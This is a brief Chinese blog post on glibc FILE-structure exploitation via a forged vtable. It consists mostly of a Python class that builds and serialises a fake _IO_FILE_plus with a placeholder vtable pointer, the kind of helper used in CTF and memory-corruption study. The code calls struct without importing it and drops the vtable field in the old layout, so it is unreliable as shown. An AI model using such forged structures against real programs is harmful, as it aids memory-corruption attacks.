io_file总结
- vtable：伪造 vtable 进行攻击。
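# Helpers and a field-by-field model of glibc's ``struct _IO_FILE_plus``.
# All pack/unpack helpers return/accept ``bytes`` (``str`` on Python 2), so the
# module works unchanged on both interpreters; the original mixed ``chr``/``ord``
# output with ``struct`` output, which raises TypeError on Python 3.
_IO_USE_OLD_IO_FILE = False
_BITS = 64


def _check_bits():
    """Raise ValueError unless ``_BITS`` is a supported word size (32 or 64)."""
    if _BITS not in (32, 64):
        raise ValueError("[-] Invalid _BITS: %r (expected 32 or 64)" % (_BITS,))


def _u64(data):
    """Unpack a little-endian unsigned 64-bit integer from *data*."""
    return struct.unpack("<Q", data)[0]


def _u32(data):
    """Unpack a little-endian unsigned 32-bit integer from *data*."""
    return struct.unpack("<I", data)[0]


def _u16(data):
    """Unpack a little-endian unsigned 16-bit integer from *data*."""
    return struct.unpack("<H", data)[0]


def _u8(data):
    """Unpack a single unsigned byte from *data*."""
    return struct.unpack("<B", data)[0]


def _usz(data):
    """Unpack a ``size_t`` sized for ``_BITS``; raises ValueError on a bad ``_BITS``."""
    _check_bits()
    return _u64(data) if _BITS == 64 else _u32(data)


def _ua(data):
    """Unpack a pointer sized for ``_BITS``; raises ValueError on a bad ``_BITS``."""
    _check_bits()
    return _u64(data) if _BITS == 64 else _u32(data)


def _p64(data):
    """Pack *data* as a little-endian unsigned 64-bit integer."""
    return struct.pack("<Q", data)


def _p32(data):
    """Pack *data* as a little-endian unsigned 32-bit integer."""
    return struct.pack("<I", data)


def _p16(data):
    """Pack *data* as a little-endian unsigned 16-bit integer."""
    return struct.pack("<H", data)


def _p8(data):
    """Pack *data* as one byte.

    The value is masked to 8 bits so that negative ``signed char`` fields
    (e.g. ``_vtable_offset``) serialise with C two's-complement semantics
    instead of raising.
    """
    return struct.pack("<B", data & 0xff)


def _psz(data):
    """Pack *data* as a ``size_t`` sized for ``_BITS``; raises ValueError on a bad ``_BITS``."""
    _check_bits()
    return _p64(data) if _BITS == 64 else _p32(data)


def _pa(data):
    """Pack *data* as a pointer sized for ``_BITS``; raises ValueError on a bad ``_BITS``."""
    _check_bits()
    return _p64(data) if _BITS == 64 else _p32(data)


class _IO_FILE_plus:
    """Field-by-field model of glibc's ``struct _IO_FILE_plus`` (a ``FILE`` plus its vtable pointer).

    Each attribute mirrors one struct member in declaration order; ``tostr()``
    serialises them into the exact byte layout glibc uses for the word size in
    ``_BITS`` (64 by default).  Set ``_IO_USE_OLD_IO_FILE`` to model the pre-2.x
    layout that stops at ``_lock``.

    Defensive context: since glibc 2.24 ``IO_validate_vtable`` aborts when a
    FILE's vtable pointer does not point into libc's own vtable section, so a
    vtable address outside that section is rejected at runtime on modern libcs.
    The default pointer values below (0x6025xx/0x602700) are placeholders
    carried over from the original snippet; callers overwrite them.

    Args:
        vtable_address: value for the trailing ``vtable`` pointer.  When omitted,
            a module-level ``vtable_address`` global is honoured if one exists
            (the original snippet read that global), else 0 is used.
    """

    def __init__(self, vtable_address=None):
        self._flags = 0x00000000fbad2887
        self._IO_read_ptr = 0x602500
        self._IO_read_end = 0x602500
        self._IO_read_base = 0x602500
        self._IO_write_base = 0x602600
        self._IO_write_ptr = 0x602600
        self._IO_write_end = 0x602600
        self._IO_buf_base = 0x602600
        self._IO_buf_end = 0x602601
        self._IO_save_base = 0
        self._IO_backup_base = 0
        self._IO_save_end = 0
        self._markers = 0
        self._chain = 0
        self._fileno = 0
        self._flags2 = 0
        self._old_offset = 0
        self._cur_column = 0
        self._vtable_offset = 0
        self._shortbuf = 0
        self._lock = 0x602700
        if not _IO_USE_OLD_IO_FILE:
            self._offset = 0
            self._codecvt = 0
            self._wide_data = 0
            self._freeres_list = 0
            self._freeres_buf = 0
            # NOTE: the double underscore is name-mangled to
            # ``_IO_FILE_plus__pad5``; kept for compatibility with the original.
            self.__pad5 = 0
            self._mode = 0
            # ``char _unused2[15 * sizeof(int) - 4 * sizeof(void*) - sizeof(size_t)]``.
            # Integer division: ``/`` produced a float on Python 3 and broke range().
            self._unused2 = [0 for _ in range(15 * 4 - 5 * _BITS // 8)]
        if vtable_address is None:
            # Honour the historical usage where the caller defined a module-level
            # ``vtable_address`` before constructing the object; else default to 0
            # instead of raising NameError.
            vtable_address = globals().get("vtable_address", 0)
        self.vtable = vtable_address

    def tostr(self):
        """Serialise the fields into the raw struct bytes for the configured ``_BITS``.

        Returns:
            bytes (``str`` on Python 2): ``sizeof(struct _IO_FILE_plus)`` bytes,
            i.e. 224 on 64-bit and 152 on 32-bit with the modern layout.

        Raises:
            ValueError: if ``_BITS`` is neither 32 nor 64.
        """
        _check_bits()
        is64 = _BITS == 64
        # ``int _flags`` is 4 bytes; on 64-bit it is followed by 4 bytes of
        # padding so the first pointer member is 8-byte aligned.
        parts = [_p32(self._flags & 0xffffffff)]
        if is64:
            parts.append(_p32(0))
        parts.extend(_pa(value) for value in (
            self._IO_read_ptr,
            self._IO_read_end,
            self._IO_read_base,
            self._IO_write_base,
            self._IO_write_ptr,
            self._IO_write_end,
            self._IO_buf_base,
            self._IO_buf_end,
            self._IO_save_base,
            self._IO_backup_base,
            self._IO_save_end,
            self._markers,
            self._chain,
        ))
        parts.append(_p32(self._fileno))
        parts.append(_p32(self._flags2))
        # ``_IO_off_t _old_offset`` is ``long``: pointer-sized, not always 8 bytes.
        parts.append(_psz(self._old_offset))
        parts.append(_p16(self._cur_column))
        parts.append(_p8(self._vtable_offset))
        parts.append(_p8(self._shortbuf))
        if is64:
            # cur_column(2) + vtable_offset(1) + shortbuf(1) = 4 bytes, then
            # 4 bytes of padding before the ``_lock`` pointer on 64-bit.
            parts.append(_p32(0))
        parts.append(_pa(self._lock))
        if not _IO_USE_OLD_IO_FILE:
            # ``_IO_off64_t _offset`` is always 8 bytes.
            parts.append(_p64(self._offset))
            parts.append(_pa(self._codecvt))
            parts.append(_pa(self._wide_data))
            parts.append(_pa(self._freeres_list))
            parts.append(_pa(self._freeres_buf))
            parts.append(_psz(self.__pad5))
            parts.append(_p32(self._mode))
            parts.append(b"".join(_p8(x) for x in self._unused2))
            parts.append(_pa(self.vtable))
        return b"".join(parts)

    def __bytes__(self):
        """``bytes(obj)`` is the Python 3 way to obtain the serialised struct."""
        return self.tostr()

    def __str__(self):
        # Kept for the original Python 2 usage (``str(obj)``); on Python 3 use
        # ``bytes(obj)`` or ``tostr()`` since ``__str__`` may not return bytes.
        return self.tostr()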
# Build a FILE structure with the module defaults and serialise it into ``s``.
_fake_file = _IO_FILE_plus()
s = _fake_file.tostr()
本文作者:NoOne
本文地址: https://noonegroup.xyz/posts/fb6ee9e/
版权声明:转载请注明出处!